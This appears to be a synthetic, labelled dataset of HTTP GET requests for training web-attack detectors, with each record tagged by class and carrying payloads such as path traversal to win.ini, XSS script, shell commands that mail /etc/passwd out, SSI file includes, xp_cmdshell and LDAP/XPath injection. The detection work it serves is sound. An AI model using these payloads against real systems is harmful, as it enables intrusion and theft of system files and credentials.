Accept-Language: r1Yrio-eVdao, spohc-Rhr;q=0.1, hO-ehzs0, ii-ret, thaw50a-at4
Cache-Control: no-store
Client-ip: 255.140.114.178
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Sat, 16 Feb 08 10:52:41 GMT
ETag: "MhgtnkMwpcoGEAB"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Sat, 07 Jan 06 05:13:57 GMT
If-Unmodified-Since: Fri, 07 May 04 08:49:06 CET
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: *
If-Range: Wed, 26 Aug 09 07:11:13 GMT
Max-Forwards: 6
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZGhvaW5yZWlhdG1lcmV5Z2luam9Ub29hY29sNWxkbmgzT2VpcWVudGR2dGZTcw==
Authorization: NTLM Y2lpbmNhb2RyazRsbnM4d2FUbm5uZXVlejVpdDJpcnJ2RW1h
Range: -364650
Referer: /eohctn/NnLu7the.swf
TE: trailers
Trailer: TE
User-Agent: 3Gkircoi/3.4
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 718x8492
Via: 0.2 35.169.79.117, HTTP/3.5 253.74.79.228, 2.0 www.iueozaod.png
Transfer-Encoding: compress
Upgrade: ja8xa/5.6
Warning: 707 66.170.198.17:64394 "nmdeaEo7jen" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49239
Start - Id: 38442
class: LdapInjection
GET /eacn7/bHKkwU2O/tRveexn6xN.DU0E3qe/so1o5nsJeYt/syre.swf?hcyaas0ohsrOrrl=annlnp&0breneriTs0c=uao+&-6LxmlchildjQSUc=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&aieta9weexantt=rorir&eokntwl1ae3d=te88uI&tuytttnbrdctg=tnoEzdeIoYpy HTTP/1.0
Host: 60.212.141.98:38257
Connection: ipwpsc
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: t82izll-is, eowp4hcs-fn;q=0.9, a-e
Cache-Control: max-stale
Client-ip: 245.206.186.144
Cookie: c2id=2i1oa
Cookie2: $Version="1"
Date: Thu, 30 Jul 09 07:11:54 UTC
ETag: W/"BpcspexLKViXdbtMsF0W"
Expect: dhhyijas=mxidodg
From: rrdhloR@le2p.gov
If-Modified-Since: Tue, 29 May 07 13:56:33 CET
If-Unmodified-Since: Thu, 05 Feb 04 05:33:56 CET
If-Match: "lYDjuaJTlLKJXd0A47"
If-None-Match: *
If-Range: Thu, 10 May 07 12:25:04 UTC
Max-Forwards: 6
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: NTLM ZWlIYUJvZnJpb2VuZGVFbWFpYW1sMXJkaWRzeXVscjE=
Range: 722-
Referer: http://www.4teTttf.ch/Evahn/aeei0/0nyaeexm.png
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 1.9; eT-eI; rv:7.1.0) Gecko/26460907
UA-CPU: 68000
UA-Disp: 664,920,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 7.8 16.254.235.238:89, 1.1 www.rooeTLr.css:678
Transfer-Encoding: compress
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38442
Start - Id: 45140
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.clthot7i.ch
Connection: ren3o
Accept: text/xml;q=0.2, video/*;q=0.8, audio/basic
Accept-Charset: *
Accept-Language: *;q=0.0
Cache-Control: max-age=240
Cookie: loaDlrpnwsm=i;egjS0daS=o;ncSof3ZRb=9142218436;yvcs=EortmaAowtln
Cookie2: $Version="007"
Date: Sun, 08 Oct 06 11:01:49 GMT
ETag: "lqmFIaU9n7qmiRtYCX"
MIME-Version: 9.6
Pragma: er7uvrN='eiTldzr'
Authorization: Digest qop=auth
Referer: http://www.qcycuAo.net/tldl/agedt8/ea1nwqf/eeEelv.cgi
User-Agent: i5WVEZnP http://www.o9r02s.it
X-Serial-Number: 97877
----: -----------

null

End - Id: 45140
Start - Id: 47265
class: XSS
GET /86position.WOfrom/EUQ9Rzsock_stream/rQd.css?NopesFr9sOzSerr=ior8&4cdeezafr=OesaikNii&amohAIqhi=199450980&et=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++%3E%3Cscript+%3E%5Balert+++%28%27eAqhli%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&ehioOvinOhrHua=4&ur=eNt&h%ufcopy0httpsM.=tcbeoe%3Bo%3C&xthTtn5j6r=NOocnuuueessui2rno HTTP/1.0
Host: www.luelihh.be:80
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: szs-eam;q=0.1, boa-auyGdr;q=0.5, f-uwp5ta5;q=0.5, meeHluR-tAsOa;q=0.3
Cache-Control: max-stale=2
Client-ip: 10.37.184.28
Cookie: rI=:hediryOtue:;phy=eb20ebrlecme;95aontwk=sallediao2lcort;reu=nEft6i5;ncargntu=0670721;uLFx6S6BX=mtn
Cookie2: $Version="0"
Date: Mon, 23 Feb 09 19:54:14 CET
ETag: W/"23jIscF3AhyqY.WJB"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 02 Mar 10 09:19:04 UTC
If-Match: *
If-None-Match: "l3Hl775Y3-0BG2s"
If-Range: "cK.IXQxI2yMdAH-"
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic c0lkZHRkNTpucmZH
Authorization: nnhdRA o6m0ceIi=tsasnct
Range: -1,528-520677
Referer: http://wjEs.be/q8wLeesi.html
TE: gzip,chunked;q=0.8
Trailer: Warning
User-Agent: tmasa/1.6.5.8
UA-CPU: Sparc
UA-Disp: 5931,8389,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 753x7661
Via: 4.5 241.48.49.251, dryox/2.8 www.adbt.shtml:3, hrw/9.8 81.77.9.175
Transfer-Encoding: deflate
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47265
Start - Id: 43526
class: OsCommanding
GET /C0w5y1MOw2U0LCT/HSansc/kPq01Vjb.pxMypTQI8K/eanhneq7i6Eanehj/11.nsf?tcsedf=oops%3B+++++cat+++%2Fetc%2Fpasswd%7C+++++mail++++your%40rnuaw.com&.XJxW=tp23rtei0ott&ftplsryieF6h=17477&ra3n2=%40Yc&TenY=h+pso0+%29rsyxtermtelnetkm HTTP/1.1
Host: 255.134.143.92
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress;q=0.0
Accept-Language: *;q=0.5
Cache-Control: hvb0=helOnr
Client-ip: 254.18.78.75
Cookie: inihfibteneoc=mSKkjJU
Cookie2: $Version="7"
Date: Fri, 01 Jun 07 13:24:00 UTC
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Mon, 07 Sep 09 24:02:13 UTC
If-Unmodified-Since: Sun, 25 Dec 05 17:46:23 CET
If-Match: *
If-None-Match: "4WppccyxNdCePyZ4i84"
If-Range: Thu, 26 Mar 09 21:13:17 UTC
Max-Forwards: 9
MIME-Version: 3.5
Pragma: unosnta9=cedd9naE
Proxy-Authorization: Basic QWFhaWM6cm5pb0Ez
Authorization: Basic bnRDZWRlbHo6ZXJlQ2g=
Range: -2781,-259,93-77910
Referer: http://nnmoego.it/teqee/hetrjet/lawse/ftRHf.png
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.8 (Windows; U; WinNT 4.5; no-ah; rv:1.9.3) Gecko/17334165
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 612x3131
Via: 8.2 www.rlonRrlt.tiff:87527, HTTP/2.3 236.72.8.74
Transfer-Encoding: deaMh
Upgrade: icjo/5.5
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43526
Start - Id: 35721
class: XPathInjection
GET /uZFXlxvIC/xVJxoL_af2bZ3jKlv8Rt/vqNHdNJrJ6Bi7_ebk/Taupse/eaWfw/sIbssuiei7ttrcn.html?bjc1hla=SZDts0%27+++or+6+++++%3C+++count%28path%2Fchild%3A%3A*%29++++or+++++%27ijaty%27+++%3D++++%27 HTTP/1.1
Host: www.4h6oS.com:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-2022-jp, utf-8
Accept-Encoding: 
Accept-Language: rii-fnUit;q=0.1
Cache-Control: no-transform
Client-ip: 18.203.213.243
Cookie: suctdehsisY=9o= 
Cookie2: $Version="10"
Date: Thu, 09 Dec 04 13:15:23 GMT
ETag: "9TLGw4cFfJoMYxvIefp"
Expect: 100-continue
From: nptt@ai166.st
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Fri, 07 Sep 07 23:03:54 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Sep 09 01:06:22 CET
Max-Forwards: 89
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aXg5bm5mbmVyc2hlOWV3aGh0bDI2YmNPaWJ1ZW9ycHlybmUybmVoaWhlbm9oYQ==
Range: 270125-,-22999
Referer: http://www.etnhja.net/Oabm.mp3
TE: gzip,gzip
Trailer: TE
User-Agent: Mozilla/5.1 (Windows; U; WinNT 7.9; st-aa; rv:5.4.3) Gecko/74335795
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: 5.3 www.Sw2steew.htm, FTP/1.8 www.seft.gif
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35721
Start - Id: 39363
class: SSI
GET /ae/icgcCxrdKy.gif?0o=aifslsamuHOiI&tstkg=ulsntldfiavSeeshge&rIno2g=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&mh9=aEa&djn81hrr=711277354&eoetnhlI=aeGj2c&beaeetbzwtdh4ni=O9con&5ue=wr%2B3zuG1N&ienro=phpservices&uirjeeeos8etq2o=ugroup+by&tsea13eUselOh=crf%28+elhO+samnrf%25u2tdocumentau&bioneitlmEtfk=ytrhek%29%7Ceie&e1h=0801673 HTTP/1.1
Host: 233.241.18.43
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 105.126.198.220
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Sat, 03 Oct 09 03:16:07 GMT
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 11 Apr 09 05:19:17 GMT
If-Match: *
If-None-Match: "l5hwTGXkh7vltlvqs"
If-Range: Sun, 19 Mar 06 20:24:23 CET
Max-Forwards: 0995
MIME-Version: 9.5
Pragma: ht=o
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest nonce
Range: 3517-0,7-1
Referer: http://ttyJplO.gov/toow.nsf
TE: chunked,deflate,deflate
Trailer: Referer
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 1.6; 6t-mc; rv:0.9.7) Gecko/82627475
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 6.7 11.130.17.205:130
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39363
Start - Id: 38731
class: LdapInjection
GET /hMRbD7wiK/Nyta3o/eAa/JUshutdownformhtacceshN/hybrqeeoRes/tF92Vq6brQzo6@VZAMC/15KgHlp4Nd@5cuDF5h/trL_p93GjIoXW/TH62DwJiAtmpxuiIl.php4?niohiEEpd2dcij=%29+++%28+%7C++%28bhs%3Dseile*%29&wacQa06TR6=19960&WFdA7wHlocationQ=httpEs4&Cyeoi0deleteRhSkh=AatNldfle0ssbhAitu&tdo7uSco=3&ADmochaGQ=Itcr4efeonn&6cdase3pt=I&dmDatjGtiwwUi=Lnlh6meu&N8rHQWnPe=edhr1msnirrrror HTTP/1.1
Host: www.odbikss8e.uk:72
Connection: close
Accept: application/*;q=0.5, audio/*, image/gif;q=0.6
Accept-Charset: iso-8859-8;q=0.2, x-mac-greek;q=0.5, gb2312;q=0.3, euc-tw
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: no3FseoepnlesrX=rptum26do%ij0R u9~ei;qisunh=ai18ltnotin;aamtrn5enla=094;iudeqesjlne=78183;we3dhdoefa=y3ac3;9hgtmaawooneo6=277163214
Cookie2: $Version="056"
Date: Fri, 06 Mar 09 04:02:08 CET
ETag: "3@dn_UCGIlqI_Vtrv8"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: "a8BfFov.wQgNTYi25UOM"
If-Range: Thu, 07 Aug 08 05:05:00 CET
Max-Forwards: 0577
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: Digest username="76nlskE"
Range: -753,93960-,-52
Referer: http://eaEih.st/i1Mtj/yt4tdtbe/febetud/mhywy/hg3owyq.tiff
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/0.1 (Windows; U; WinNT 7.0; aU-r2; rv:8.5.8) Gecko/15029451
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: gzip
Upgrade: u3thye/4.0, rfee/2.0
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38731
Start - Id: 40595
class: SSI
GET /omLuBJ1Al20guF@RwG-/k3.t9@rxuTgh/eXWIcqCCizmh/twm6reaiueU/pxgyvicN./xFRTNAWt60m1r-SR/l3c72aAw7Ti8U@5amhi/nOt0W2@zN1Kggxaj/unnfbiu.php?Y3XXHscriptmpQ=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&inOEnrql=1&JM6insertRrCB=+Nsi++xaWctprocessing-instruction4h&e9urude=sateIe&gIYUE_C=z1t&crtRo=iiwinsert&yat=tnh8%5Dsen%3E+pmo%25okllu8&nstlea=eie+dimgcEsat+N+i HTTP/1.0
Host: 90.208.105.48
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.5, macintosh;q=0.9, koi8, x-mac-roman;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 26.51.86.223
Cookie: tcaps4ihdtee=24628
Cookie2: $Version="1"
Date: Wed, 17 Sep 08 10:25:12 GMT
ETag: W/"bb110ijb0AjJQj0"
Expect: ararE=eiee;ruarxe=eikmeie
From: rboa@y3rzvAlmvo.org
If-Modified-Since: Sun, 17 Dec 06 15:15:13 UTC
If-Unmodified-Since: Thu, 17 Mar 05 20:45:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4004
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: Digest response="E77Aea6332dC4Ea1d7Ce3caf337cCAd4"
Range: 67529-
Referer: http://www.32Wss.org/Yjttui/ottfsit/Zn3tao/9sune.jpeg
TE: gzip;q=0.3
Trailer: Warning
User-Agent: drpwn7vsnoc0iewe
UA-CPU: StrongARM
UA-Disp: 4510,669,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: HTTP/5.5 227.162.179.69
Transfer-Encoding: identity
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40595
Start - Id: 41137
class: SqlInjection
GET /bulMS60wp-Z/xjUbtxpassthru4access_logrFa/cP_.bin?rti5h=exec++++xp_cmdshell+++%27%22midiemgi%22+%3E%3E+++script.vbs%27&au=ll HTTP/1.1
Host: 156.46.78.248
Connection: close
Accept: application/*, application/*;q=0.4
Accept-Charset: hz-gb-2312;q=0.8, windows-1253;q=0.6, iso-8859-2;q=0.1, isiri-3342;q=0.3, koi8
Accept-Encoding: gzip;q=0.7, deflate, deflate, compress;q=0.4, identity
Accept-Language: r-tdtb8m;q=0.6, ir-ma
Cache-Control: no-transform
Client-ip: 1.110.214.117
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="173"
Date: Fri, 12 Nov 04 24:59:46 CET
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Sat, 10 Jul 04 14:14:37 GMT
If-Unmodified-Since: Thu, 21 May 09 06:50:01 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "KuNHUMzqJiC.OFi6Wx"
If-Range: "KuHTSHQH3xkyPaCIzW4"
Max-Forwards: 9
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: Basic NmVhZnRva2Q6aUljaWph
Range: 9-668228,-687
Referer: http://a1pr.ch/cfiuoo/d9spinbH/6ztd/thtN/rk1yehf.png
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.9 (X11; U; Unix 7.6; Ht-pi; rv:4.2.1) Gecko/87762680
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color16
Via: 2.8 www.eLjS.tiff, FTP/5.1 www.7oeaS.png, FTP/8.9 136.48.60.27
Transfer-Encoding: identity
Upgrade: ng6s/4.8, 4et/8.2
Warning: 198 130.0.9.220:076 "si9M9yfcee" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41137
Start - Id: 40803
class: SSI
GET /5z7tatoh/hzeEfaioeat/e5J/uT6bkhUZz47I/sD89qi-d80yC/hgJEQor5ce/uieu6nOPemto0rxajo/H9Aeiyh1B2nosehpfest/ua0hP318pAqvbP8iqI/a4TaiatiusteUdIylsu.nsf?dai=2359&l7tth=xddsrd5brl3Sp&a86yln=f3sew%3Frsy9&itaa=jqIAnN_hLlIq&nmo=ls%29i&4dIceer26maaoas=%3C%21--+++%23odbc++connect%3D%22Iar3Cn%2Cnstaye%2Csiez%22++++++++++statement%3D%22select++*+from+++T%22--%3E&o7oesesh=azv&aEE7bejXK=Oed&NmseooscRq2eys=rX&linkTmailuQ3=eicuorTnEhndrop&trteoANeAyeaso=oQrYf&qkio=iT7FF-u7 HTTP/1.1
Host: www.Eeun.it
Connection: lenec
Accept: audio/*;q=0.9, audio/*, video/*
Accept-Charset: euc-kr, iso-2022-kr
Accept-Encoding: 
Accept-Language: rnjh-na
Cache-Control: egdatd='uemso'
Client-ip: 183.101.183.29
Cookie: iiemy=y
Cookie2: $Version="6"
Date: Sat, 17 Mar 07 13:18:27 CET
ETag: W/"VVcj4Ggote7jxo7"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 04 Jun 09 06:55:00 UTC
If-Unmodified-Since: Tue, 28 Jun 05 02:36:33 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: "8Th5eGNdGnS@WdvonBa8"
Max-Forwards: 8
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest username="easT"
Authorization: Digest response="9F42047561F5AaD360880AC7E2cE3148"
Range: 89010-,593978-8589,-17027
Referer: /nsc5pztn/soo0m61.gif
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.2 (X11; U; Solaris 1.1; ee-iz; rv:6.8.4) Gecko/68672763
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: sts/5.5 www.aobtd.shtml, 4.8 www.Ioma.css:5
Transfer-Encoding: compress
Upgrade: f6i/6.1
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40803
Start - Id: 49233
class: XPathInjection
GET /p1GlCgmrZ@2-DKd/_tmp448Hlbgsoundor5y82j/nc9C.htm?whoxd=Nh%27++++or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i++%2Bj++++%2Bk+%2B+++l+%2B++++1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++%27mdAle%27+%3D+%27+++Girt%27++or HTTP/1.1
Host: www.enuaaap0io.biz
Connection: close
Accept: application/zip;q=0.9, image/*;q=0.3, image/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.9, identity, gzip
Accept-Language: WxW-se3;q=0.2, A8oeii-ian4tns;q=0.0
Cache-Control: min-fresh=2652
Client-ip: 233.26.158.113
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Thu, 25 Jun 09 08:30:32 UTC
ETag: W/"@I55TFnnWMOE6wgh"
Expect: eiotoeTc
From: hi2H@ura3sfneT.ch
If-Modified-Since: Mon, 29 Dec 08 04:50:04 UTC
If-Unmodified-Since: Wed, 23 Jan 08 11:47:52 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: "EdGH8tIYRZaWjxH"
If-Range: "D@9Plj7rNhFwXCgE.a"
Max-Forwards: 02
MIME-Version: 5.2
Pragma: johtk='ttQ'
Proxy-Authorization: NTLM d2NybGtuaXlhYXRpWWU4cmVIZDhkZWppaHVhdzFEY2RzYWVud3Rucm1kb2xmUkxk
Authorization: lrtk2e iuti=tps7h
Range: -364650
Referer: http://www.aahddz.biz/egoi/tAtnsb/1yhEauEa/t8gs3/egospo.php4
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/6.4 (compatible; MSIE 9.1; Mac OS X; cqnestEL0i)
UA-CPU: Sparc
UA-Disp: 2447,4165,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 353x220
Via: 4.1 219.54.70.223, FTP/0.8 131.42.213.212
Transfer-Encoding: identity
Upgrade: 8rpe5E/5.6, tre/6.8, 6Gt/7.8, xleel/2.7
Warning: 378 www.ecns.png "easteTT0eewfrbeti3jm" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 2668554721639
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49233
Start - Id: 37021
class: LdapInjection
GET /aaetvdMnd8to/iDGh/3q1U8@/sEBPBk.J-QXsKc@yP/VMePIEyKshutdownZ.OE/cmdLxa.msf?teeq=783&5d=Ei%29%28%26%28objectClass+%3D++is*%29&HCywinntfgIexecil=rnnaeOcZsl HTTP/1.1
Host: www.spa6nmj.be
Connection: phwtrso
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate, gzip, identity, deflate
Accept-Language: eowt-qDpupi
Cache-Control: max-stale=883
Client-ip: 191.221.35.119
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="6"
Date: Thu, 27 Mar 08 07:08:24 UTC
ETag: W/"M2xwjae@G8gpcI6el9.Y"
Expect: 100-continue
From: B3nrc@Ecode1.gov
If-Modified-Since: Fri, 13 Aug 04 19:53:08 UTC
If-Unmodified-Since: Mon, 05 Jul 04 07:20:50 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Digest uri=/oetf2ni.asmx
Range: 00177-,0-7679,-82265
Referer: /ielwte2.jpeg
TE: chunked;q=0.0,chunked;q=0.6,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: ugtcdny
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 7.7 www.dncf.html, 4.5 www.iy3rs.tiff:20, 3.9 155.57.126.158:412
Transfer-Encoding: identity
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37021
Start - Id: 40728
class: SSI
GET /eR1/rr_h5M94905bk-ByBLM/kertes6aldnn5brraa/nqEh/au7w_/rcnBFeseeFsvsd4mni/iPXvAsBOpKi_pwpKxROe/sk8cYaB.php?A4d0ehchyonadle=onc1&_gFJha.cE=omxsn&Nwluoecmeho=ge&8m3hj2izt9re2ps=rjU0&qOo7h=034525458&9g3t=2631303&@QRUH=Ryvma%3Dsouh%7E&D7hJuls=nTj_b9&j7vd9Leeo=nOHx6EoD&rt=jAlagRcefgnarcqs5&aenv7=nkhc1gWaomi&nbtuevTens=ns&execALt=ersi&Dieinneei=aJQn&processing-instructionDFDxxa0gC.=wmmods HTTP/1.1
Host: 232.19.131.211
Connection: noeEaAsA
Accept: audio/*, text/*;q=0.5, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: <!--#odbc   connect="wsiu,ae5R,a6s"      statement="select  *   from     hEoo"-->
Accept-Language: aAhiAa-amd5a
Cookie: kIt5su=i@;nnHqOwenAl=stdin;qc3lbrgcroW=q@m
Date: Tue, 31 May 05 08:57:50 GMT
Expect: slla=8Sstmype;itidhoa
If-Match: *
If-Range: "ka9lst6XsWODW4IhFJT"
Referer: /torp/ZItkiirs.rar
User-Agent: dIdPRsn1Cx http://www.fmCdie.cz
X-Forwarded-For: 168.72.228.20

null

End - Id: 40728
Start - Id: 43585
class: OsCommanding
GET /Hlbio8nifOSWER/UVIYBmMOiNVJ/i1Uvy9KcOtYi0/yNaob/osdeaxwo/t459_mgf6uA/iXwindow.openp4HdVd7a3OY/PkQSV3ORRju.jpeg?octhoiw=uSeboKIdhcpseotehc&eg=68191&owuiudsn2oo=ls++++-las+++++%2Fhome%2F++%7C&seccmclelT9k=ugav&wLjONz=xrsnekyscc6 HTTP/1.0
Host: www.xvu3.cz
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 209.18.180.198
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="9"
